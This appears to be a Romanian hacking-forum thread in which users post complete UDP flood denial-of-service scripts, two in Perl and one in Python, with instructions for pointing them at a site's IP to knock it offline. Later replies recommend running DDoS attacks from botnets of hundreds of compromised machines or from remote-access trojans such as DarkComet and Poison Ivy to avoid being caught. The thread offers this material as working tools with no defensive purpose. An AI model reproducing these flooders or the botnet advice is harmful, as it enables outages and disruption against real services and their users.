C0nfigurati0n Posted October 23, 2008 Report Posted October 23, 2008 #!/usr/bin/perluse Socket;$ARGC=@ARGV;if ($ARGC !=3) { printf "$0 <ip> <port> <time>\n"; printf "for any info vizit http://rstcenter.com/ \n"; exit(1);}my ($ip,$port,$size,$time); $ip=$ARGV[0]; $port=$ARGV[1]; $time=$ARGV[2];socket(crazy, PF_INET, SOCK_DGRAM, 17); $iaddr = inet_aton("$ip");printf "Amu Floodez $ip pe portu $port \n";printf "daca nu pica in 10 min dai pe alt port \n";if ($ARGV[1] ==0 && $ARGV[2] ==0) { goto randpackets;}if ($ARGV[1] !=0 && $ARGV[2] !=0) { system("(sleep $time;killall -9 udp) &"); goto packets;}if ($ARGV[1] !=0 && $ARGV[2] ==0) { goto packets;}if ($ARGV[1] ==0 && $ARGV[2] !=0) { system("(sleep $time;killall -9 udp) &"); goto randpackets;}packets:for ( { $size=$rand x $rand x $rand; send(crazy, 0, $size, sockaddr_in($port, $iaddr));} randpackets:for ( { $size=$rand x $rand x $rand; $port=int(rand 65000) +1; send(crazy, 0, $size, sockaddr_in($port, $iaddr));}Il savati in extensia .pl blabla il folositi cu PerlUDP Flood este foarte puternic, poti pica siteuri repede si usorCum il folosesc?:In CMD scri:udp.pl <ip site> 0 0Si dai EnterBafta, C0nfigurati0n Quote
dblackshell Posted October 25, 2008 Report Posted October 25, 2008 #!/usr/bin/perl############### udp flood.##############use Socket;use strict;if ($#ARGV != 3) { print "flood.pl <ip> <port> <size> <time>\n\n"; print " port=0: use random ports\n"; print " size=0: use random size between 64 and 1024\n"; print " time=0: continuous flood\n"; exit(1);}my ($ip,$port,$size,$time) = @ARGV;my ($iaddr,$endtime,$psize,$pport);$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";$endtime = time() + ($time ? $time : 1000000);socket(flood, PF_INET, SOCK_DGRAM, 17);print "Flooding $ip " . ($port ? $port : "random") . " port with " . ($size ? "$size-byte" : "random size") . " packets" . ($time ? " for $time seconds" : "") . "\n";print "Break with Ctrl-C\n" unless $time;for (;time() <= $endtime;) { $psize = $size ? $size : int(rand(1024-64)+64) ; $pport = $port ? $port : int(rand(65500))+1; send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}via google... e mai dragalas ca nu e spaghetti code Quote
ovi_x Posted October 25, 2008 Report Posted October 25, 2008 si daca serverul are dual balancing ce faci stai pana nu , mai ai tu conexiune ? Ddosul ii mai sigur si mai bun Quote
jacko Posted August 2, 2011 Report Posted August 2, 2011 va sfatuiesc la flooding sa folositi RAT-uri :De ce?Odata ca e DDOS, nu DOS, deci sanse mici sa te prinda sau sa opreasca ataculA doua ca pica mai repede ca perl daca ai boti destui Incercati sa studiati, apoi sa da-ti flood :Denial-of-service attack - Wikipedia, the free encyclopediaRAT-uri :DarkComet ( ?Dark Comet RAT - Tutorial & Features! (HD)?? - YouTube )Poison Iv ( )... Quote
Gabriel87 Posted August 6, 2011 Report Posted August 6, 2011 De dai de pe banda ta de net si nu ai bandapici tu mai repede decat victima:)) Quote
hirosima Posted August 7, 2011 Report Posted August 7, 2011 la probat cineva, intradevar functioneaza? Quote
Gabriel87 Posted August 7, 2011 Report Posted August 7, 2011 Script-ul functioneaza foarte bine daca ai banda mare de net daca nu ai am mai spus pici tu mai repede decat victima deci daca nu ai banda destula nu are rost sa dati cu el Quote
rh- Posted August 8, 2011 Report Posted August 8, 2011 Tre' sa fii nebun sa folosesti asta de pe netul tau. Faci niste boti, 500-600 si dai de pe ei Traficul ajunge la valori ametitoare, si sunt sanse mari sa pice toata clasa. Quote
BGS Posted August 8, 2011 Report Posted August 8, 2011 (edited) Aveam nevoie de exercitiu asa ca in loc sa pierd timpul aiurea am facut si o versiune pentru python 2.7 !Nu stiu cat de bine functioneaza l-am testat pe netul meu de 30 lei !Concluzia? in 0.5 secunde am pierdut conexiunea la net deci banuiesc ca e ceva de capul lui hehe !Enjoy !#!/usr/bin/env pythonimport socketimport sysimport random#Don't take it without giving proper credits !def main(): arg = sys.argv if len(arg) != 3: print '''[-]Usage: py_udp flooder by BGS (http://rstcenter.com) If you don't have bandwidth don't waste your time trying this ! Syntax: udp_flood.py ip port[-]Exiting... ''' else: print '[!]Starting...' destination = arg[1] port = int(arg[2]) sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) bytes = random._urandom(1024) while True: sock.sendto(bytes,(destination,port)) if socket.timeout == True: break print '[-]Task completed!'if __name__=='__main__': main()LE: Nu stiu cat de bine functioneaza (sau daca macar functioneaza ) Edited August 8, 2011 by BGS Quote
Gabriel87 Posted August 8, 2011 Report Posted August 8, 2011 Tre' sa fii nebun sa folosesti asta de pe netul tau. Faci niste boti, 500-600 si dai de pe ei Traficul ajunge la valori ametitoare, si sunt sanse mari sa pice toata clasa.Pai atunci iti faci boti intr-un botnet pe irc si dai din botnet DDos nu iti faci 500-600 boti si dai cu asta Quote